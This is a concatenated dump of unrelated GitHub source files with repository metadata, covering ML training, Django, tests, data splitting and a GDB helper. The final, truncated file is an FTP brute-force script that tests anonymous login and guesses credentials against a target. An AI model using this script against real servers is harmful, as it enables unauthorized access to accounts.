if early_epochs is not None:
early_epochs = 0
model_save_path = os.path.join(log_dir, 'pytorch_model.bin')
# model.save_pretrained(log_dir) # export model with transformers for save the config too
torch.save(model.state_dict(), model_save_path)
optimizer_save_path = os.path.join(log_dir, 'optimizer.pt')
checkpoint_dict = {
'optimizer': optimizer.state_dict(),
'scheduler': lr_scheduler.state_dict(),
'step': step,
'epoch': epoch
}
if scaler is not None:
checkpoint_dict['scaler'] = scaler.state_dict()
torch.save(checkpoint_dict, optimizer_save_path)
print("\n > BEST MODEL ({0:.5f}) saved at {1:}".format(
val_loss, model_save_path))
else:
if early_epochs is not None:
early_epochs += 1
return best_loss, early_epochs
|
[
"edresson1@gmail.com"
] |
edresson1@gmail.com
|
47e279735f840d1e03f6ec23975d5337aa5da6bc
|
376e4114a1ef612ae5d0d2a53a74076870562067
|
/2017/R1CA/Pancake.py
|
91a0621901dc3c2ad74766f7eec04f93645d6b25
|
[] |
no_license
|
jacegem/google-codejam-py
|
1890e895c56ceb6c4cbcaa4c5cae213f1cb2dd6a
|
4e3300021c7f54c339da92afc0974d5076d60499
|
refs/heads/master
| 2021-06-06T07:45:53.946239
| 2021-04-10T03:30:49
| 2021-04-10T03:30:49
| 89,255,303
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 445
|
py
|
class Pancake:
def __init__(self, r, h, top, surface):
self.r = r
self.h = h
self.top = top
self.surface = surface
self.used = False
self.top_surface = top + surface
def set_used(self, used):
self.used = used
def is_used(self):
return self.used
def get_top_surace(self):
return self.top_surface
def sort_surface(self):
return self.surface
|
[
"jacegem@gmail.com"
] |
jacegem@gmail.com
|
0c951d03079b7356ec0f67cbf8d87e34b58a4537
|
1edf4c50123a6001b30cff3ad098d566f058ed8f
|
/utility/dataSplit.py
|
d7b3bfe61f47b3d43122e90d8c00effdac2fb8d1
|
[] |
no_license
|
HaohanWang/geneExpressionRepresentation
|
be19fa9c89b55063f22614bf6938249275264369
|
5e6881f7e5f3c3a04325437a4894387219e852b8
|
refs/heads/master
| 2021-01-10T17:44:36.209021
| 2016-05-03T05:44:19
| 2016-05-03T05:44:19
| 50,133,394
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,246
|
py
|
import numpy as np
# ids = [line.strip() for line in open('../data/ids.txt')]
#
# text = [line.strip() for line in open('../data/ppi_ids.txt')]
#
# ppi = {}
#
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# ppi[(id1, id2)] = 0
#
# count = 0
#
# p = []
# n = []
# np.random.seed(1)
#
# for id1 in ids:
# count += 1
# if count %100==0:
# print id1
# for id2 in ids:
# if (id1, id2) in ppi:
# p.append((id1, id2))
# else:
# if np.random.random() < 0.00017:
# n.append((id1, id2))
#
# print len(n)
# p = p[:12500]
# n = n[:12500]
#
# for i in range(5):
# f1 = open('../data/split/ids_train_'+str(i+1)+'.txt', 'w')
# f2 = open('../data/split/ids_test_'+str(i+1)+'.txt', 'w')
# f1_ = open('../data/split/labels_train_'+str(i+1)+'.txt', 'w')
# f2_ = open('../data/split/labels_test_'+str(i+1)+'.txt', 'w')
#
# for k in range(i*2500, (i+1)*2500):
# f2.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f2_.writelines('1\n')
# for k in range(i*2500, (i+1)*2500):
# f2.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f2_.writelines('0\n')
#
# for k in range(0, i*2500):
# f1.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f1_.writelines('1\n')
# for k in range((i+1)*2500, 12500):
# f1.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f1_.writelines('1\n')
#
# for k in range(0, i*2500):
# f1.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f1_.writelines('0\n')
# for k in range((i+1)*2500, 12500):
# f1.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f1_.writelines('0\n')
#
# f1.close()
# f2.close()
# f1_.close()
# f2_.close()
ids = [line.strip() for line in open('../data/ids.txt')]
print len(ids)
data = np.loadtxt('../data/ge.csv', delimiter=',')
print data.shape
ge = {}
for i in range(len(ids)):
ge[ids[i]] = data[i,:]
#
# for i in range(5):
# t1l = []
# t1r = []
# t2l = []
# t2r = []
#
# #train
# text = [line.strip() for line in open('../data/split/ids_train_'+str(i+1)+'.txt')]
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# t1l.append(ge[id1])
# t1r.append(ge[id2])
# np.savetxt('../data/split/data_train_'+str(i+1)+'_a.txt', t1l, delimiter=',')
# np.savetxt('../data/split/data_train_'+str(i+1)+'_b.txt', t1r, delimiter=',')
#
# #test
# text = [line.strip() for line in open('../data/split/ids_test_'+str(i+1)+'.txt')]
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# t2l.append(ge[id1])
# t2r.append(ge[id2])
# np.savetxt('../data/split/data_test_'+str(i+1)+'_a.txt', t2l, delimiter=',')
# np.savetxt('../data/split/data_test_'+str(i+1)+'_b.txt', t2r, delimiter=',')
text = [line.strip() for line in open('../data/ids_final.txt')]
t1l = []
t1r = []
for line in text:
items = line.split()
id1 = items[0]
id2 = items[1]
t1l.append(ge[id1])
t1r.append(ge[id2])
np.savetxt('../data/split/data_final_a.txt', t1l, delimiter=',')
np.savetxt('../data/split/data_final_b.txt', t1r, delimiter=',')
|
[
"haohanw@andrew.cmu.edu"
] |
haohanw@andrew.cmu.edu
|
30665cc9a04c96f8151128447b3694303cff9e74
|
293b7305b86628aa92e23ea10f799b4848661aa5
|
/implugin/flashmsg/tests/test_models.py
|
6cc1793d411b7303753914717ef8ebcdde503af4
|
[] |
no_license
|
socek/impaf-flashmsg
|
2ce751c54ff8d9e95f38a691b3579320e3ace546
|
4af4355934f6edf512893f7e9dacfe188179ea62
|
refs/heads/master
| 2020-04-08T20:58:21.124723
| 2015-08-14T18:05:55
| 2015-08-14T18:05:55
| 38,713,760
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 655
|
py
|
from mock import sentinel
from impaf.testing import PyTestCase
from ..models import FlashMessage
class TestFlasMessage(PyTestCase):
_object_cls = FlashMessage
def test_to_dict(self):
obj = self.object(sentinel.message, sentinel.msgtype)
assert obj.to_dict() == {
'message': sentinel.message,
'msgtype': sentinel.msgtype,
}
def test_from_dict(self):
obj = self.object()
obj.from_dict({
'message': sentinel.message,
'msgtype': sentinel.msgtype,
})
assert obj.message == sentinel.message
assert obj.msgtype == sentinel.msgtype
|
[
"msocek@gmail.com"
] |
msocek@gmail.com
|
1ce69a1233f5a517348185955b4ec1e46eafffd4
|
c7aea375046d194a5bd3c9fda615519f4374b790
|
/lab3/text_recognizer/networks/line_lstm_ctc.py
|
35205b418d4502e5425aa5d9522fd2821741b094
|
[] |
no_license
|
venuraja79/fsdl-text-recognizer-project
|
195b16bff453df5acda65181e96f65cb98172b54
|
1b9d20f0de2dd5aa59af490b086f985411c60e20
|
refs/heads/master
| 2020-06-30T22:09:45.433461
| 2019-08-07T08:53:05
| 2019-08-07T08:53:05
| 200,964,049
| 0
| 1
| null | 2019-08-07T03:20:26
| 2019-08-07T03:20:24
| null |
UTF-8
|
Python
| false
| false
| 2,406
|
py
|
"""LSTM with CTC for handwritten text recognition within a line."""
import tensorflow.keras.backend as K
from tensorflow.python.client import device_lib # pylint: disable=no-name-in-module
from tensorflow.keras.layers import Dense, Input, Reshape, TimeDistributed, Lambda, LSTM, CuDNNLSTM
from tensorflow.keras.models import Model as KerasModel
from text_recognizer.networks.lenet import lenet
from text_recognizer.networks.misc import slide_window
from text_recognizer.networks.ctc import ctc_decode
def line_lstm_ctc(input_shape, output_shape, window_width=28, window_stride=14): # pylint: disable=too-many-locals
image_height, image_width = input_shape
output_length, num_classes = output_shape
num_windows = int((image_width - window_width) / window_stride) + 1
if num_windows < output_length:
raise ValueError(f'Window width/stride need to generate >= {output_length} windows (currently {num_windows})')
image_input = Input(shape=input_shape, name='image')
y_true = Input(shape=(output_length,), name='y_true')
input_length = Input(shape=(1,), name='input_length')
label_length = Input(shape=(1,), name='label_length')
gpu_present = len(device_lib.list_local_devices()) > 2
lstm_fn = CuDNNLSTM if gpu_present else LSTM
# Your code should use slide_window and extract image patches from image_input.
# Pass a convolutional model over each image patch to generate a feature vector per window.
# Pass these features through one or more LSTM layers.
# Convert the lstm outputs to softmax outputs.
# Note that lstms expect a input of shape (num_batch_size, num_timesteps, feature_length).
# Your code below (Lab 3)
# Your code above (Lab 3)
input_length_processed = Lambda(
lambda x, num_windows=None: x * num_windows,
arguments={'num_windows': num_windows}
)(input_length)
ctc_loss_output = Lambda(
lambda x: K.ctc_batch_cost(x[0], x[1], x[2], x[3]),
name='ctc_loss'
)([y_true, softmax_output, input_length_processed, label_length])
ctc_decoded_output = Lambda(
lambda x: ctc_decode(x[0], x[1], output_length),
name='ctc_decoded'
)([softmax_output, input_length_processed])
model = KerasModel(
inputs=[image_input, y_true, input_length, label_length],
outputs=[ctc_loss_output, ctc_decoded_output]
)
return model
|
[
"sergeykarayev@gmail.com"
] |
sergeykarayev@gmail.com
|
f49719da2036ba7ff1dc02db5fb0434c2acd830a
|
f23a0561ed2e1f5192a2933ba3205bbc84e0172c
|
/ruidun_system/internet_operate/viewsets/get_monitoring_viewset.py
|
f7d1a4efbee6c85c9b9e2e159797e78386e57bc5
|
[] |
no_license
|
TingxieLi/django-restframework
|
a179a794760830cedcf60c0069cb7c8d4c7127cd
|
3645bc3a396727af208db924c6fdee38abc0f894
|
refs/heads/master
| 2020-12-05T13:13:29.937243
| 2019-07-18T03:33:23
| 2019-07-18T03:33:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 267
|
py
|
from rest_framework import viewsets
class GetMonitoringViewSet(viewsets.ReadOnlyModelViewSet):
def retrieve(self, request, *args, **kwargs):
# 获取视频内容,视频应该是实时传输的,这里应该怎么返回数据?
pass
|
[
"851864721@qq.com"
] |
851864721@qq.com
|
08f94cf25a949eefbaca4cf0a9b2fc8d254be62e
|
f295b56e9af284092233a724af041a91b35a9f6a
|
/binary-tree-level-order-traversal/binary-tree-level-order-traversal.py
|
eb00973a0045f605df9fbf717059748d2f4e83a2
|
[] |
no_license
|
saviaga/Coding_E
|
7ebdf03b5eca775903ee4b863b56e26190b40029
|
dd21bb3b9d8905263416b206877f1a3d9416ee3f
|
refs/heads/main
| 2023-05-02T19:42:07.267054
| 2021-05-21T17:41:52
| 2021-05-21T17:41:52
| 334,220,320
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 794
|
py
|
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def levelOrder(self, root: TreeNode) -> List[List[int]]:
if root is None:
return
queue = collections.deque([root])
ans = []
while queue:
level = []
for _ in range(len(queue)):
current = queue.popleft()
level.append(current.val)
if current.left:
queue.append(current.left)
if current.right:
queue.append(current.right)
ans.append(level)
return ans
|
[
"saviaga@gmail.com"
] |
saviaga@gmail.com
|
4ce02e446ce4895df060625959a73f6d4a1e7ff2
|
1deda52f84b25e52a70dd26afa31c1e40a8391ac
|
/tools/improved-bertscore-for-image-captioning-evaluation/match_cand_refs.py
|
e691f1f139291d3f3ce03d32227a38703e6144ae
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
jlcsilva/syncap
|
7ae7b7974b1c3eeb6507006a325725a67c765c7b
|
c8191de4e77b6ea9109f124b9f398d9f2c7d7662
|
refs/heads/master
| 2023-04-10T23:16:39.902339
| 2021-04-23T06:03:24
| 2021-04-23T06:03:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 906
|
py
|
import json
import argparse
from collections import defaultdict
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--refs_file')
parser.add_argument('--cand_file')
parser.add_argument('--output_fn')
args = parser.parse_args()
# Refs
j = json.load(open(args.refs_file))
anns = j['annotations']
image2anns = defaultdict(list)
for ann in anns:
image2anns[ann['image_id']].append(ann['caption'].strip())
# Cand
j = json.load(open(args.cand_file))
image2cand = defaultdict(list)
for ann in j:
image2cand[ann['image_id']].append(ann['caption'])
samples = {}
for ix, img in enumerate(image2cand):
d = dict()
d['refs'] = image2anns[img] #[:5]
d['cand'] = image2cand[img]
samples[str(ix)] = d
with open(args.output_fn, 'w') as f:
json.dump(samples, f)
|
[
"emanuele@di.ku.dk"
] |
emanuele@di.ku.dk
|
79d14202170a7d08135e126bbb7479e3da932f84
|
09f0505f3ac1dccaf301c1e363423f38768cc3cc
|
/r_DailyProgrammer/Easy/C266/unittests/unittest.py
|
07fde993ddb932a70f2021b847e679aadef121e2
|
[] |
no_license
|
Awesome-Austin/PythonPractice
|
02212292b92814016d062f0fec1c990ebde21fe7
|
9a717f91d41122be6393f9fcd1a648c5e62314b3
|
refs/heads/master
| 2023-06-21T11:43:59.366064
| 2021-07-29T23:33:00
| 2021-07-29T23:33:00
| 270,854,302
| 0
| 0
| null | 2020-08-11T20:47:10
| 2020-06-08T23:24:09
|
Python
|
UTF-8
|
Python
| false
| false
| 259
|
py
|
#! python3
import unittest
from r_DailyProgrammer.Easy.C266.unittests.test_values import TEST_VALUES
class MyTestCase(unittest.TestCase):
def test_something(self):
self.assertEqual(True, False)
if __name__ == '__main__':
unittest.main()
|
[
"{ID}+{username}@users.noreply.github.com"
] |
{ID}+{username}@users.noreply.github.com
|
7e177a8d82713addc215fa1037b0a74cbfaafb7d
|
b9be3d951bfab350191092540edc6e353283d621
|
/.direnv/python-3.4.3/bin/rst2xml.py
|
94a9206c1126cc30a738a855d3950f2aca899539
|
[] |
no_license
|
bekkblando/django-social
|
7ebd82f66c82ffa6918621e5ee7142bfa5f712d8
|
fe47d1babb94170e5403af9ce0f3c672c3045a0d
|
refs/heads/master
| 2020-12-11T01:40:01.429628
| 2015-08-18T14:24:33
| 2015-08-18T14:24:33
| 38,706,690
| 0
| 0
| null | 2015-07-07T18:25:26
| 2015-07-07T18:25:25
| null |
UTF-8
|
Python
| false
| false
| 668
|
py
|
#!/Users/BekkBlando/Documents/github/djangosocial/.direnv/python-3.4.3/bin/python3.4
# $Id: rst2xml.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing Docutils XML.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates Docutils-native XML from standalone '
'reStructuredText sources. ' + default_description)
publish_cmdline(writer_name='xml', description=description)
|
[
"bekkblando@gmail.com"
] |
bekkblando@gmail.com
|
52aee0fd09b24edae3d34ee70ae4d681a2aa67da
|
3291359d8867e7b5ca9e8befb83629810938f903
|
/timetable_v3/timetable_v3/urls.py
|
eb0c1bca0f82d83d2d60c6e88d1f7d126e417997
|
[] |
no_license
|
A-miin/timetable_v3
|
f9e4610800acb83f3477dcffd2b0ce1c75d2c1d0
|
1de0885f04beec83657672275deff22b71af2de3
|
refs/heads/master
| 2023-06-09T18:51:44.298534
| 2021-07-02T15:01:54
| 2021-07-02T15:01:54
| 341,462,656
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,035
|
py
|
"""timetable_v3 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
import debug_toolbar
from webapp import urls
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('webapp.urls')),
path('secretariat/', include('secretariat.urls', namespace='secretariat')),
path('api/', include('api.urls', namespace='api')),
path('__debug__/', include(debug_toolbar.urls)),
]
|
[
"zulaykaisaeva@gmail.com"
] |
zulaykaisaeva@gmail.com
|
2ad7d7451c252323a7b922b7ce42a3e1f7a03c10
|
1ec29bec73904435980eedc26b3f1e07fafb8784
|
/shmakovpn/tests/add_method_to_class/test_add_method_to_class.py
|
cbf04d3fd1befc3caed91a88242ef0ba4f9491ed
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
shmakovpn/shmakovpn_tools
|
4f799c803f4ebdff0e82253ec161d5977e6036cb
|
85090c9489b0b9fa13b6c42c91459efe9b966a3b
|
refs/heads/master
| 2023-06-08T17:32:34.591391
| 2021-06-17T05:22:38
| 2021-06-17T05:22:38
| 284,875,102
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,118
|
py
|
"""
The simple example that explains the impossibility of adding a method to builtin type.
Author: shmakovpn <shmakovpn@yandex.ru>
Date: 2020-10-01
"""
import unittest
class TestAddMethodToClass(unittest.TestCase):
"""
It is possible to add a method to a class outside of the class
"""
def test_add_method_to_class(self):
class A:
x = 'hello'
a = A()
A.get_x = lambda self: self.x
self.assertEqual(a.get_x(), 'hello')
def test_add_method_to_list(self):
"""
It is impossible to add a method to a built-in type
:return:
"""
try:
list.hello = lambda self: f'hello from list'
some_list = []
self.assertEqual(some_list.hello(), 'hello from list')
except TypeError as e:
pass
except Exception as e:
self.assertTrue(False, msg='An unknown exception was raised instead of the expected TypeError')
else:
self.assertTrue(False, msg='The expected TypeError exception was not raised')
|
[
"shmakovpn@yandex.ru"
] |
shmakovpn@yandex.ru
|
66d3b0de7469b1683d10d96d96d69ab4acea07d3
|
56b36ddf920b5f43e922cb84e8f420f1ad91a889
|
/Hackerrank/Hackkerrank-Designer PDF Viewer.py
|
1c85d2e8aa255eccd12daed1cbc4d104ce1bd3ca
|
[] |
no_license
|
chithien0909/Competitive-Programming
|
9ede2072e85d696ccf143118b17638bef9fdc07c
|
1262024a99b34547a3556c54427b86b243594e3c
|
refs/heads/master
| 2022-07-23T16:47:16.566430
| 2020-05-12T08:44:30
| 2020-05-12T08:44:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 564
|
py
|
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the designerPdfViewer function below.
def designerPdfViewer(h, word):
# word = nhan
# arr = [1,3,2,1]
arr=[]
for letter in word:
index = ord(letter) - 97
arr.append(h[index])
return max(arr) * len(arr)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
h = list(map(int, input().rstrip().split()))
word = input()
result = designerPdfViewer(h, word)
fptr.write(str(result) + '\n')
fptr.close()
|
[
"ntle1@pipeline.sbcc.edu"
] |
ntle1@pipeline.sbcc.edu
|
07c43020b2c4de524585a2995ba0ad589f42ef70
|
8fd92c0a65c9b3e3912b6e8ef043656ee225880a
|
/datetime_examples.py
|
e6023b44234c3f6cfb1b822db2448812f1685d86
|
[] |
no_license
|
waiteb15/py3forsci3day
|
9fbcbb59f1c14f3d91cb2599d7ca8b4d6ac628c4
|
fc664042618f0910d40e85677a2438eef5cce2b7
|
refs/heads/master
| 2020-04-25T11:24:18.697218
| 2019-02-28T23:40:52
| 2019-02-28T23:40:52
| 172,743,315
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 988
|
py
|
#!/usr/bin/env python
from datetime import date, datetime, timedelta, time
today = date.today()
print(today, today.year)
james_bd = date(2014, 8, 1)
print(james_bd)
delta = today - james_bd
print(delta)
years = int(delta.days // 365.25)
print(f"James is {years} years old")
event = datetime(2019, 5, 11, 13, 22, 47)
print(event)
ten_years = timedelta(10 * 365.25)
print(james_bd + ten_years)
import time
start = time.time()
# do something
end = time.time()
seconds = end - start
print("Wait for it....", end="", flush=True)
time.sleep(0)
print("done")
from dateutil.parser import parse
import dateutil.utils
my_dates = [
"Apr 1, 2019",
"2019-04-01",
"4/1/19",
"4-1-2019",
"April 1 2019",
"Feb 31, 2032",
]
for d in my_dates:
try:
print(parse(d))
except Exception as err:
print(err)
d = dateutil.utils.datetime(2019, 4, 1, 11, 11, 11, 0)
print(d, type(d))
|
[
"waiteb15@gmail.com"
] |
waiteb15@gmail.com
|
10ebe15e221446bab08a4d897fc101f9d8a8b95f
|
a5aabe2e4057d78e687a57a6b560516a7cdb5836
|
/unsserv/common/rpc/protocol.py
|
688b39a308b01db7dacf58311fc8aea432c875c7
|
[
"MIT"
] |
permissive
|
aratz-lasa/py-unsserv
|
0ffc09ddab65a11ce917d0faa8b1b5dff091e563
|
6f332385e55d05953186b9a8b7848bca4b878e18
|
refs/heads/master
| 2022-12-14T21:10:12.397834
| 2020-05-03T11:29:49
| 2020-05-03T11:29:49
| 228,329,158
| 5
| 0
|
MIT
| 2022-12-08T07:00:55
| 2019-12-16T07:35:20
|
Python
|
UTF-8
|
Python
| false
| false
| 2,808
|
py
|
import asyncio
from abc import ABC, abstractmethod
from dataclasses import is_dataclass, asdict
from enum import IntEnum
from typing import Any, Tuple, Sequence, Dict, Callable
from unsserv.common.rpc.rpc import RPCRegister, RPC
from unsserv.common.rpc.structs import Message
from unsserv.common.structs import Node
Command = IntEnum
Data = Any
Handler = Callable[..., Any]
class ITranscoder(ABC):
my_node: Node
service_id: str
def __init__(self, my_node: Node, service_id: str):
self.my_node = my_node
self.service_id = service_id
@abstractmethod
def encode(self, command: Command, *data: Data) -> Message:
pass
@abstractmethod
def decode(self, message: Message) -> Tuple[Command, Sequence[Data]]:
pass
class AProtocol:
my_node: Node
service_id: str
_rpc: RPC
_transcoder: ITranscoder
_handlers: Dict[Command, Handler]
_running: bool
def __init__(self, my_node: Node):
self.my_node = my_node
self._rpc = RPCRegister.get_rpc(my_node)
self._handlers = {}
self._running = False
async def start(self, service_id: str):
if self._running:
raise RuntimeError("Protocol already running")
self.service_id = service_id
self._transcoder = self._get_new_transcoder()
await self._rpc.register_service(service_id, self.handle_rpc)
self._running = True
async def stop(self):
if self._running:
await self._rpc.unregister_service(self.service_id)
self._running = False
async def handle_rpc(self, message: Message):
command, data = self._transcoder.decode(message)
handler = self._handlers[command]
if asyncio.iscoroutinefunction(handler):
response = await handler(message.node, *data)
return self._encode_response(response)
else:
response = handler(message.node, *data)
return self._encode_response(response)
def _encode_response(self, response: Any) -> Any:
if isinstance(response, list):
return [self._encode_response(response_item) for response_item in response]
elif isinstance(response, tuple):
return tuple(
self._encode_response(response_item) for response_item in response
)
elif hasattr(response, "encode"):
return response.encode()
elif is_dataclass(response):
return asdict(response)
elif isinstance(response, set):
return list(response)
return response
@abstractmethod
def _get_new_transcoder(self):
"""
Method for initializing ITranscoder, because every Protocol implements
its own.
:return:
"""
pass
|
[
"aratzml@opendeusto.es"
] |
aratzml@opendeusto.es
|
17ae1f4270a5e2ebf48e65265aafc3399ecba836
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/E9FwvGyad5CDbiH4C_14.py
|
47f2553b08320fb3dbcb4e7c16ad17e66bc52e21
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
def block(lst):
lista = [list(i) for i in list(zip(*lst)) if 2 in i]
q = 0
for i in lista:
q += len(i) - (i.index(2) + 1)
return q
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
f4823491f0f44b3d340a720dbc47cf29a5a8e325
|
55540f3e86f1d5d86ef6b5d295a63518e274efe3
|
/toolchain/riscv/MSYS/riscv64-unknown-elf/lib/rv32imfdc_zba_zbb/ilp32d/libstdc++.a-gdb.py
|
8e9d75e886ed14abcb55b187bbbe376b0ca67b81
|
[
"Apache-2.0"
] |
permissive
|
bouffalolab/bl_iot_sdk
|
bc5eaf036b70f8c65dd389439062b169f8d09daa
|
b90664de0bd4c1897a9f1f5d9e360a9631d38b34
|
refs/heads/master
| 2023-08-31T03:38:03.369853
| 2023-08-16T08:50:33
| 2023-08-18T09:13:27
| 307,347,250
| 244
| 101
|
Apache-2.0
| 2023-08-28T06:29:02
| 2020-10-26T11:16:30
|
C
|
UTF-8
|
Python
| false
| false
| 2,772
|
py
|
# -*- python -*-
# Copyright (C) 2009-2020 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import gdb
import os
import os.path
pythondir = '/scratch/jenkins/workspace/tpp-freedom-tools/tpp03--build-binary-packages--parameterized/obj/x86_64-w64-mingw32/install/riscv64-unknown-elf-gcc-10.2.0-2020.12.8-x86_64-w64-mingw32/share/gcc-10.2.0/python'
libdir = '/scratch/jenkins/workspace/tpp-freedom-tools/tpp03--build-binary-packages--parameterized/obj/x86_64-w64-mingw32/install/riscv64-unknown-elf-gcc-10.2.0-2020.12.8-x86_64-w64-mingw32/riscv64-unknown-elf/lib/rv32imfdc_zba_zbb/ilp32d'
# This file might be loaded when there is no current objfile. This
# can happen if the user loads it manually. In this case we don't
# update sys.path; instead we just hope the user managed to do that
# beforehand.
if gdb.current_objfile () is not None:
# Update module path. We want to find the relative path from libdir
# to pythondir, and then we want to apply that relative path to the
# directory holding the objfile with which this file is associated.
# This preserves relocatability of the gcc tree.
# Do a simple normalization that removes duplicate separators.
pythondir = os.path.normpath (pythondir)
libdir = os.path.normpath (libdir)
prefix = os.path.commonprefix ([libdir, pythondir])
# In some bizarre configuration we might have found a match in the
# middle of a directory name.
if prefix[-1] != '/':
prefix = os.path.dirname (prefix) + '/'
# Strip off the prefix.
pythondir = pythondir[len (prefix):]
libdir = libdir[len (prefix):]
# Compute the ".."s needed to get from libdir to the prefix.
dotdots = ('..' + os.sep) * len (libdir.split (os.sep))
objfile = gdb.current_objfile ().filename
dir_ = os.path.join (os.path.dirname (objfile), dotdots, pythondir)
if not dir_ in sys.path:
sys.path.insert(0, dir_)
# Call a function as a plain import would not execute body of the included file
# on repeated reloads of this object file.
from libstdcxx.v6 import register_libstdcxx_printers
register_libstdcxx_printers(gdb.current_objfile())
|
[
"jczhang@bouffalolab.com"
] |
jczhang@bouffalolab.com
|
0d1bfe45270d76b88c774d848ede4a38ee8cb120
|
60364a7089bc359494a4a42ba6d79c2fd0b84185
|
/django_extended/emailing/backend.py
|
ced758319243991dd06e01a4e9d2d45cbf3c16e2
|
[
"BSD-3-Clause"
] |
permissive
|
dalou/django-extended
|
4936c77535bc4421a9f003da58a49629bc7996df
|
a7ba952ea7089cfb319b4615ae098579c9ab14f9
|
refs/heads/master
| 2021-10-27T09:33:28.615992
| 2015-12-14T14:55:33
| 2015-12-14T14:55:33
| 46,408,921
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,698
|
py
|
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.mail.backends.base import BaseEmailBackend
from django.core.mail.message import sanitize_address, DEFAULT_ATTACHMENT_MIME_TYPE
from django.core.mail.backends.smtp import EmailBackend
from .models import *
class DevBackend(EmailBackend):
def route_recipients(self, recipients):
for i,r in enumerate(recipients):
recipients[i] = "autrusseau.damien@gmail.com, adelineautrusseau@gmail.com"
return recipients
def _send(self, message):
orginial_receiver = ", ".join(message.to)
message.to = self.route_recipients(message.to)
message.cc = self.route_recipients(message.cc)
message.bcc = self.route_recipients(message.bcc)
message.subject += ' <orginal receivers : %s>' % orginial_receiver
super(DevBackend, self)._send(message)
class ProductionBackend(EmailBackend):
def route_recipients(self, recipients):
# if getattr(settings, 'EMAIL_DOMAIN_ONLY', False):
# receivers = ", ".join(list(set(TestEmail.objects.all().values_list('email', flat=True))))
# # for i,r in enumerate(recipients):
# # if not r.endswith('@%s' % PROJECT_DOMAIN):
# # recipients = settings.DEFAULT_FROM_EMAIL
return recipients
def _send(self, message):
# if getattr(settings, 'EMAIL_DOMAIN_ONLY', False):
# message.to = self.route_recipients(message.to)
# message.cc = self.route_recipients(message.cc)
# message.bcc = self.route_recipients(message.bcc)
super(ProductionBackend, self)._send(message)
|
[
"autrusseau.damien@gmail.com"
] |
autrusseau.damien@gmail.com
|
f51a2ebb6f85f0f5d06ee9ac9dd3373d5880f1d0
|
d17724b2ce056b435f57b16fb0cbea32e44a29c6
|
/Gun4PY/ftp-bruteforce.py
|
0f673dce18e4b54b0c7f64d8571451b8a5f6f497
|
[] |
no_license
|
UgurCIL/Examples
|
27264d89131b4aaff46f91705a03779c4e825ad6
|
c1722a519836a24c8a946380e6cbcd6da963f0c5
|
refs/heads/master
| 2020-04-24T15:28:17.288204
| 2019-02-22T13:30:35
| 2019-02-22T13:30:35
| 172,069,050
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,018
|
py
|
import sys
from ftplib import FTP
def checkAnonymous(dstIP):
try:
ftp = FTP(dstIP)
ftp.login()
print "[*] Anonymous giris acik"
print "[*] Kullanici Adi : anonymous"
print "[*] Parola : anonymous"
ftp.close()
except:
pass
def ftpLogin(dstIP, user, passw):
try:
ftp = FTP(dstIP)
ftp.login(user, passw)
ftp.quit()
print "[!] Kullanici/Parola bulundu."
